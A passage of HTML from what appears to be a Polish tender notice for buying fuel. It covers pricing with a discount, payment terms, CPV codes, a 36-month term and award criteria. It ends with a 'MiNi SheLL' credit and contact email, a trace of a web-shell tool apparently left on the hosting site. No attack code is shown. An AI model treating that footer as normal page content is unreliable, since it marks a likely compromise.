4.	Cena za pobrane paliwo będzie naliczona każdorazowo według cen obowiązujących dla poszczególnych rodzajów paliw na danej stacji w dniu, w którym zostanie dokonany zakup paliwa, pomniejszona o opust.
5.	Termin płatności wynosi 21 dni od dnia wystawienia i dostarczenia faktury VAT. Za datę dokonania płatności przyjmuję się datę uznania rachunku bankowego Wykonawcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Opust - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com